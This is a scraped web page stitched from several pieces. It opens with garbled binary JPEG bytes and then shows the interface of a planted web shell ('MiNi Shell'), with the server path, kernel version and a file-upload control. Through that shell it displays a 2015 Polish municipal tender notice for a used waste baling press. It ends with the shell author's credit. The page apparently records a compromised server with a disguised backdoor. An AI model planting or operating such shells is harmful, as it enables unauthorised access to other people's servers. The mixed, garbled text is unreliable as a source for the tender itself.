JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150804/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150804/116201-N-2015.html

<p class="kh_header"><b>Mysłakowice: Dostawa używanej
automatycznej prasy belującej do odpadów z wstępnym zgniotem realizowana w ramach
zadania Zakup belownicy - prasy wraz z montażem Oznaczenie sprawy IP-271-21/2015.</b><br>
<b>Numer ogłoszenia: 116201 - 2015; data zamieszczenia: 04.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Związek Gmin Karkonoskich , ul. Robotnicza 6, 58-533 Mysłakowice, woj. dolnośląskie, tel. 75 7182415, 7183323, faks 75 7131089.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> : http://www.zgk-karkonosze.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: związek międzygminny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa używanej
automatycznej prasy belującej do odpadów z wstępnym zgniotem realizowana w ramach
zadania Zakup belownicy - prasy wraz z montażem Oznaczenie sprawy IP-271-21/2015..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem
zamówienia jest dostawa używanej automatycznej prasy belującej z wstępnym zgniotem
przeznaczonej do prasowania surowców wtórnych oraz frakcji nadsitowej 19 12 12 zgodnie z
poniższymi wskazaniami i parametrami: 1.1. Wymagane parametry techniczne a. Wymiary
minimalne otworu wlotowego (długość x szerokość) - min. 1.100 mm x 1.300 mm. b. Silnik
główny - min 30 kW; c. Wydajność praktyczna - min. 8,5 tony na godzinę, dla materiału 35
kg/m3 d. Siła zgniotu -nacisk główny - min. 50 ton/ 490 kN; e. Siła zgniotu- wstępnego -
min.25T / 245kN f. Wiązanie hydrauliczne automatyczne - min.4 krotne g. Długość beli -
regulowana h. Wysokość x szerokość beli - min. 800 mm x 1.100 mm. i. Ilości oleju układzie
hydraulicznym wraz ze zbiornikiem - nie więcej niż 550 litrów j. Kolor- RAL 6011 k.
Rozmiary prasy - wysokość prasy wraz ze stopami nie więcej 4.850mm l. Waga beli od 400
do700 kg w zależności od materiału m. Kompletna jednostka sterująca dla jednego
przenośnika załadowczego n. Ogrzewanie szafy sterowniczej, załączane poza układem
zasilania belownicy o. Opisy na tablicy rozdzielczej w języku polskim 1.2.Cena Cena winna
zawierać : a. Koszty transportu, b. Koszty zainstalowania belownicy - prasy, c. Koszty 
uruchomienia wraz z przeszkoleniem obsługi, 1.3. Wymagane dokumenty - kompletna
dokumentacja techniczno - rozruchowa w języku polskim, - 3 egzemplarze DTR, w tym jedna
na nośniku elektronicznym, - deklaracja CE, 1.4. Miejsce dostarczenia Teren Karkonoskiego
Centrum Gospodarki Odpadami w Ścięgnach - Kostrzycy. 1.5. Szkolenie Wykonawca
przeprowadzi bezpłatne szkolenie 4 wytypowanych pracowników, poświadczone
certyfikatem dostawcy. 1.6. Gwarancja 1.6.1. Zamawiający oczekuje udzielenia gwarancji : -
min. 3 miesiące dla części hydraulicznych (nie więcej jak 500 motogodzin) na wady
materiałowe i/lub wady konstrukcyjne, nie dotyczy szybko zużywających się części, itp. -
min. 6 miesięcy na części elektryczne; -min. gwarancja 6 miesięcy na części mechaniczne
(nie więcej jak 500 motogodzin), na wady materiałowe i/lub wady konstrukcyjne, nie dotyczy
szybko zużywających się części, itp. 1.6.2. W okresie gwarancji Wykonawca obowiązany jest
do nieodpłatnego usuwania stwierdzonych wad urządzeń i instalacji. 1.6.3. W okresie
gwarancji Wykonawca wykona bezpłatne jeden przegląd gwarancyjny nie później niż miesiąc
przed końcem gwarancji. 1.6.4. Gwarancja liczona jest od daty podpisania bez zastrzeżeń
protokołu zdawczo - odbiorczego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 42.63.61.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 12. Wymagania dotyczące wadium. 12.1. Warunkiem
udziału w przetargu jest wniesienie wadium w wysokości 8 000,00 zł brutto 12.2. Wadium
może być wnoszone w następujących formach: 12.2.1. pieniądzu; 12.2.2. poręczeniach
bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że
poręczenie kasy jest zawsze poręczeniem pieniężnym; 12.2.3. gwarancjach bankowych;
12.2.4. gwarancjach ubezpieczeniowych; 12.2.5. poręczeniach udzielanych przez podmioty, o
których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej
Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275). 12.3. Wadium należy wnieść najpóźniej przed upływem terminu składania oferty, potwierdzenie wpłaty wadium  na konto Zamawiającego  należy dołączyć do składanej oferty.
Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto Zamawiającego nr 50 1500 1429 1214 2004 9506 0000 w Banku Zachodnim WBK S.A. 6 Oddział w Jeleniej Górze. Na przelewie należy umieścić informację: Wadium: Dostawa używanej automatycznej prasy belującej do odpadów z wstępnym zgniotem .
 12.4. Wadium w formie innej niż pieniężna należy złożyć w siedzibie Zamawiającego: ul. Robotnicza 6, 58-533 Mysłakowice;
Przy przekazaniu tych dokumentów osoba je składająca otrzyma odpowiednie potwierdzenie.
12.5. W przypadku składania przez Wykonawcę wadium w formie wskazanej w pkt. 12.2.2.
do 12.2.5, wadium powinno być sporządzone adekwatnie do formy, w której jest wnoszone i
winno zawierać następujące elementy: 12.5.1.nazwę dającego zlecenie (Wykonawcy),
beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta (banku lub instytucji
ubezpieczeniowej udzielających gwarancji) lub poręczyciela oraz wskazanie ich siedzib;
12.5.2.określenie wierzytelności, która ma być zabezpieczona gwarancją lub poręczeniem;
12.5.3.kwotę gwarancji lub poręczenia; 12.5.4.termin ważności wadium; 12.5.5.zobowiązanie
gwaranta/poręczyciela do: zapłacenia kwoty wadium na pierwsze pisemne żądanie
Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano: a- w
odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub
oświadczeń, o których mowa w art. 25 ust. 1 ustawy lub pełnomocnictw, b- odmówił
podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
c-zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn
leżących po stronie Wykonawcy. 12.6 Zwrot wadium oraz sytuacja jego ewentualnego
zatrzymania uregulowana jest w art.46 ustawy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których
spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca wykaże, że
posiada doświadczenie zawodowe, legitymując się wykonaniem w okresie
ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres
prowadzenia działalności jest krótszy w tym okresie co najmniej 2 usług
głównych polegających na dostawie prasy belującej o wartości nie mniejszej
niż 60.000,00zł każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których
spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których
spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony jeśli Wykonawca wykaże, że
posiada opłaconą (na dzień składania ofert) polisę ubezpieczenia od
odpowiedzialności cywilnej prowadzonej działalności gospodarczej o wartości,
co najmniej 100.000, 00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Podpisane oświadczenie o spełnianiu warunków art. 22 ust. 1 Ustawy - wzór:
Dokument 1 pkt. I. 9.1.2. Wykaz wykonywanych, a w przypadku świadczeń okresowych lub
ciągłych również dwóch wykonywanych, głównych dostaw w okresie ostatnich trzech lat
przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy -
w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na
rzecz których dostawy zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane
lub są wykonywane należycie (wg opisu określonego w pkt.8.1.2) - wzór: Dokument 3. (w
przypadku Wykonawców zagranicznych Zamawiający dokona przeliczenia waluty obcej na 
PLN według średniego kursu ogłoszonego przez Narodowy Bank Polski na dzień otwarcia
ofert) 9.1.3. Poświadczeń, potwierdzających, że dostawy określone w pkt 8.1.2 zostały
wykonane należycie z tym że: a) w odniesieniu do nadal wykonywanych dostaw okresowych
lub ciągłych poświadczenie wydane przez podmiot na rzecz którego wykonywana była
dostawa powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu
składania ofert; b) jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca
nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt 9.1.3 a wykonawca, w
miejsce poświadczeń, może przedkładać dokumenty potwierdzające, że wykazane dostawy -
zostały wykonane należycie, określone w rozporządzeniu Prezesa Rady Ministrów z dnia
30.12.2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od
wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226,
poz.1817). 9.3. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale
technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych
innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.
Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie
dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając
w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji
niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Jeżeli
Wykonawca, wykazując spełnienie warunków wymaganych w niniejszej specyfikacji, polega
na zasobach innych podmiotów, a podmioty te będą brały udział w realizacji części
zamówienia. Zamawiający żąda od Wykonawców przedstawienia w odniesieniu do tych
podmiotów następujących dokumentów i informacji : a) w przypadku warunków , o których
mowa w pkt 8.1.2 SIWZ : -informacji dotyczących zakresu dostępnych wykonawcy zasobów
innego podmiotu , - sposobu wykorzystania tych zasobów przy realizacji nin. Zamówienia, -
zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia, - charakteru
stosunku, jaki będzie łączył wykonawcę z innym podmiotem. 9.4. Jeżeli Wykonawca ma
siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast
dokumentu, o którym mowa w pkt. 9.2.2- 9.2.3, składa dokument lub dokumenty wystawione
w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające, że: -nie otwarto
jego likwidacji , nie ogłoszono upadłości, -nie zalega z uiszczaniem podatków, opłat, składek
na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie,
odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania
decyzji właściwego organu, -nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
Termin ważności takiego oświadczenia musi być tożsamy z zastępowanym dokumentem,
wymaganym przez Zamawiającego. 9.5. Jeżeli w miejscu zamieszkania osoby lub w kraju, w
którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o
których mowa w pkt 9.4, zastępuje się je dokumentem zawierającym oświadczenie, w którym
określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym
organem sądowym, administracyjnym albo organem samorządu zawodowego lub
gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym
wykonawca ma siedzibę lub miejsce zamieszkania lub przed notariuszem. 9.6. W przypadku
wątpliwości co do treści dokumentu złożonego przez Wykonawcę, mającego siedzibę lub
miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Zamawiający może zwrócić
się do właściwych organów odpowiednio miejsca zamieszkania osoby lub kraju, w którym
Wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielnie niezbędnych
informacji dotyczących przedłożonego dokumentu. 9.7. Zamawiający wymaga w stosunku do
podmiotów (partnerów) ubiegających się wspólnie o udzielenie zamówienia (składających
wspólną ofertę, np. konsorcjów, spółek cywilnych), aby: 9.7.1. Ustanowiły Pełnomocnika do
reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i
zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi być dołączone 
do oferty. 9.7.2. Dokumenty wymienione w pkt 9.2.1. i 9.2.2. winien dołączyć każdy podmiot
występujący wspólnie. 9.7.3. Dokumenty wymienione w pkt 9.1.1. ÷ 9.1.4. winny być
złożone w imieniu wszystkich podmiotów (partnerów) przez Pełnomocnika.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - wydłużenie gwarancji ponad wymagane 3 miesięce części hydrauliczne(Kh) - 5</li>
<li>3 - wydłużenie gwarancji ponad wymagane 6 miesięcy części  mech i elektr.(Kme) - 5</li>
<li>4 - Łączny koszt przeglądu po przepracowaniu 2.000 motogodzin (Kp) - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> : http://www.kcgo.karkonosze.eu/przetargi.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Związek
Gmin Karkonoskich 58-533 Myslakowice Pałac Bukowiec ul. Robotnicza 6..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2015 godzina 12:00, miejsce: Związek Gmin Karkonoskich 58-533 Myslakowice
Pałac Bukowiec ul. Robotnicza 6..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com